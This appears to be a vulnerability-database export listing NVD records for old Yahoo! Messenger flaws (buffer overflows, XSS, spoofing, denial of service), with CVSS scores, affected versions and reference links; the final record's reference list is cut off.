Vulnerabilites related to yahoo - messenger
Vulnerability from fkie_nvd
Published
2006-12-15 22:28
Modified
2025-04-09 00:30
Severity ?
Summary
Buffer overflow in the YMMAPI.YMailAttach ActiveX control (ymmapi.dll) before 2005.1.1.4 in Yahoo! Messenger allows remote attackers to execute arbitrary code via a crafted HTML document. NOTE: some details were obtained from third party information.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6DEE11C2-06D7-47AA-8A7B-0063B97E9F58",
"versionEndIncluding": "8.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
"matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1C35A346-6510-44D2-A36E-E6661B6586F3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "ADE2C978-8812-489D-94F9-186B5519545B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the YMMAPI.YMailAttach ActiveX control (ymmapi.dll) before 2005.1.1.4 in Yahoo! Messenger allows remote attackers to execute arbitrary code via a crafted HTML document. NOTE: some details were obtained from third party information."
},
{
"lang": "es",
"value": "Desbordamiento de b\u00fafer en el controlador YMMAPI.YMailAttach ActiveX (ymmapi.dll) anterior a 2005.1.1.4 en Yahoo! Messenger permote a un atacante remoto ejecutar c\u00f3digo de su elecci\u00f3n a trav\u00e9s de un documento HTML manipulado.\r\nNOTA: algunos de estos detalles se han obtenido de informaci\u00f3n de terceros."
}
],
"id": "CVE-2006-6603",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2006-12-15T22:28:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://messenger.yahoo.com/security_update.php?id=120806"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/23401"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "http://securitytracker.com/id?1017387"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/901852"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "http://www.securityfocus.com/bid/21607"
},
{
"source": "cve@mitre.org",
"url": "http://www.vupen.com/english/advisories/2006/5016"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://messenger.yahoo.com/security_update.php?id=120806"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/23401"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "http://securitytracker.com/id?1017387"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/901852"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "http://www.securityfocus.com/bid/21607"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.vupen.com/english/advisories/2006/5016"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2005-02-18 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
The Audio Setup Wizard (asw.dll) in Yahoo! Messenger 6.0.0.1750, and possibly other versions, allows attackers to arbitrary code by placing a malicious ping.exe program into the Messenger program directory, which is installed with weak default permissions.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
"matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1351:*:*:*:*:*:*:*",
"matchCriteriaId": "38232D5E-568C-4CFA-BA01-C35939D68AB2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1750:*:*:*:*:*:*:*",
"matchCriteriaId": "0595ECE8-C876-441F-B90A-FC8D80BA1034",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The Audio Setup Wizard (asw.dll) in Yahoo! Messenger 6.0.0.1750, and possibly other versions, allows attackers to arbitrary code by placing a malicious ping.exe program into the Messenger program directory, which is installed with weak default permissions."
}
],
"id": "CVE-2005-0242",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2005-02-18T05:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://messenger.yahoo.com/security/update6.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "http://secunia.com/advisories/11815"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/secunia_research/2004-6/advisory/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://messenger.yahoo.com/security/update6.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "http://secunia.com/advisories/11815"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/secunia_research/2004-6/advisory/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2002-06-25 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger 5.0 allows remote attackers to spoof other users by modifying the username and using the spoofed username for social engineering or denial of service (flooding) attacks.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://marc.info/?l=bugtraq&m=101439616623230&w=2 | ||
| cve@mitre.org | http://www.cert.org/advisories/CA-2002-16.html | US Government Resource | |
| cve@mitre.org | http://www.iss.net/security_center/static/8267.php | Patch, Vendor Advisory | |
| cve@mitre.org | http://www.kb.cert.org/vuls/id/952875 | US Government Resource | |
| cve@mitre.org | http://www.securityfocus.com/bid/4164 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://marc.info/?l=bugtraq&m=101439616623230&w=2 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.cert.org/advisories/CA-2002-16.html | US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.iss.net/security_center/static/8267.php | Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.kb.cert.org/vuls/id/952875 | US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/4164 | Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 5.0 allows remote attackers to spoof other users by modifying the username and using the spoofed username for social engineering or denial of service (flooding) attacks."
}
],
"id": "CVE-2002-0321",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2002-06-25T04:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.iss.net/security_center/static/8267.php"
},
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/952875"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://www.securityfocus.com/bid/4164"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.iss.net/security_center/static/8267.php"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/952875"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://www.securityfocus.com/bid/4164"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2007-02-06 02:28
Modified
2025-04-09 00:30
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B9F5887C-8E39-47B5-9777-8FADE8A7C893",
"versionEndIncluding": "8.1.0.209",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de secuencias de comandos en sitios cruzados (XSS) en la funcionalidad Detalles de Contacto en Yahoo! Messenger 8.1.0.209 y anteriores permite a atacantes remotos con la intervenci\u00f3n del usuario inyectar secuencias de comandos web o HTML de su elecci\u00f3n a trav\u00e9s de un URI javascript: en el atributo SRC de un elemento IMG en los campos (1) Nombre (First Name), (2) Apellido (Last Name), y (3) Apodo (Nickname). NOTA: algunos de estos detalles se han obtenido de informaci\u00f3n de terceros."
}
],
"evaluatorImpact": "Access Complexity: Successful exploitation requires that the attacker is in the messenger list of the target.",
"id": "CVE-2007-0768",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2007-02-06T02:28:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/31674"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/23928"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/22269"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/31674"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/23928"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/22269"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2007-02-09 19:28
Modified
2025-04-09 00:30
Severity ?
Summary
Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| yahoo | messenger | 4.0 | |
| yahoo | messenger | 5.0 | |
| yahoo | messenger | 5.0.1046 | |
| yahoo | messenger | 5.0.1065 | |
| yahoo | messenger | 5.0.1232 | |
| yahoo | messenger | 5.5 | |
| yahoo | messenger | 5.5.1249 | |
| yahoo | messenger | 5.6 | |
| yahoo | messenger | 5.6.0.1347 | |
| yahoo | messenger | 5.6.0.1351 | |
| yahoo | messenger | 5.6.0.1355 | |
| yahoo | messenger | 5.6.0.1356 | |
| yahoo | messenger | 5.6.0.1358 | |
| yahoo | messenger | 6.0 | |
| yahoo | messenger | 6.0.0.1643 | |
| yahoo | messenger | 6.0.0.1750 | |
| yahoo | messenger | 6.0.0.1921 | |
| yahoo | messenger | 7.0.438 | |
| yahoo | messenger | 7.5.0.814 | |
| yahoo | messenger | 8.0 | |
| yahoo | messenger | 8.0.0.863 | |
| yahoo | messenger | 8.0_2005.1.1.4 | |
| yahoo | messenger | 8.1.0.209 | |
| yahoo | messenger | 8.1.0.239 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4A5FAAEB-793F-405B-A8D9-872FCEEBFB55",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0.1046:*:*:*:*:*:*:*",
"matchCriteriaId": "E28F9A8C-206B-49D3-9F25-D25F4CD74DF9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0.1065:*:*:*:*:*:*:*",
"matchCriteriaId": "077D9394-E0DB-4BE1-9666-ED98A459D57C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0.1232:*:*:*:*:*:*:*",
"matchCriteriaId": "DB29459E-C84F-46BC-9679-A55D285287E1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.5.1249:*:*:*:*:*:*:*",
"matchCriteriaId": "3EC324E2-C08F-4090-82CD-5A64165986F9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
"matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1347:*:*:*:*:*:*:*",
"matchCriteriaId": "CEAC4C7A-4A77-41ED-BC6D-6F962283107E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1351:*:*:*:*:*:*:*",
"matchCriteriaId": "38232D5E-568C-4CFA-BA01-C35939D68AB2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1355:*:*:*:*:*:*:*",
"matchCriteriaId": "E025BBCF-8E26-4E83-BA49-9A10E3011428",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1356:*:*:*:*:*:*:*",
"matchCriteriaId": "AC0DD432-79BA-4750-B53C-A5149DACBE08",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1358:*:*:*:*:*:*:*",
"matchCriteriaId": "47ABA651-3F7A-4647-AA21-14B552694A00",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1643:*:*:*:*:*:*:*",
"matchCriteriaId": "E9479AAB-AFFD-4976-96AC-B97DE517BFC9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1750:*:*:*:*:*:*:*",
"matchCriteriaId": "0595ECE8-C876-441F-B90A-FC8D80BA1034",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1921:*:*:*:*:*:*:*",
"matchCriteriaId": "F3FFB3BF-1092-46E4-9C0D-FF91E0FB1371",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:7.0.438:*:*:*:*:*:*:*",
"matchCriteriaId": "451603CE-2DAF-47AF-A1E6-F79A514E1E51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:7.5.0.814:*:*:*:*:*:*:*",
"matchCriteriaId": "45452EA7-2FE3-496C-A523-6B5CDDB0C540",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B7178A56-42F9-44BC-8742-402480F761FA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.863:*:*:*:*:*:*:*",
"matchCriteriaId": "5D369102-AC28-45D1-A9E7-B6C4F34529C1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0_2005.1.1.4:*:*:*:*:*:*:*",
"matchCriteriaId": "7B4212E3-8338-430F-A9BC-A28D502B8B81",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.209:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9243F4-ADE8-4B7A-A195-EEAD41FF14EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.239:*:*:*:*:*:*:*",
"matchCriteriaId": "3CAF169E-8466-43EF-A03D-D49256EB2C18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
},
{
"lang": "es",
"value": "Vulnerabilidad no especificada en la funcionalidad Chat Room en Yahoo! Messenger 8.1.0.239 y anteriores permite a atacantes remotos provocar denegaci\u00f3n de servicio a trav\u00e9s de vectores no especificado. NOTA: la procedencia de esta informaci\u00f3n es desconocida; los detalles han sido obtenidos a partir de la informaci\u00f3n de terceros. \r\n"
}
],
"id": "CVE-2007-0868",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2007-02-09T19:28:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/34696"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/22407"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/34696"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/22407"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2007-06-11 18:30
Modified
2025-04-09 00:30
Severity ?
Summary
Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:2.0.1.4:*:*:*:*:*:*:*",
"matchCriteriaId": "6944C050-C328-45DB-B2C3-0CA43C0D790C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B7178A56-42F9-44BC-8742-402480F761FA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.863:*:*:*:*:*:*:*",
"matchCriteriaId": "5D369102-AC28-45D1-A9E7-B6C4F34529C1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "012BF14B-1009-4BDE-A699-C5989F576199",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0_2005.1.1.4:*:*:*:*:*:*:*",
"matchCriteriaId": "7B4212E3-8338-430F-A9BC-A28D502B8B81",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.249:*:*:*:*:*:*:*",
"matchCriteriaId": "15660D84-B392-457E-B433-9B9180A49B3E",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information."
},
{
"lang": "es",
"value": "Desbordamiento de b\u00fafer en el control Yahoo! Webcam Upload ActiveX en ywcupl.dll versi\u00f3n 2.0.1.4 para Yahoo! Messenger versi\u00f3n 8.1.0.249 permite a los atacantes remotos ejecutar c\u00f3digo arbitrario por medio de un valor largo propiedad del servidor para el m\u00e9todo de env\u00edo. NOTA: algunos de estos datos se consiguen de la informaci\u00f3n de terceros."
}
],
"id": "CVE-2007-3147",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2007-06-11T18:30:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/25547"
},
{
"source": "cve@mitre.org",
"url": "http://securityreason.com/securityalert/2809"
},
{
"source": "cve@mitre.org",
"url": "http://securitytracker.com/id?1018204"
},
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/949817"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/24341"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/24354"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1018203"
},
{
"source": "cve@mitre.org",
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
},
{
"source": "cve@mitre.org",
"url": "https://www.exploit-db.com/exploits/4042"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
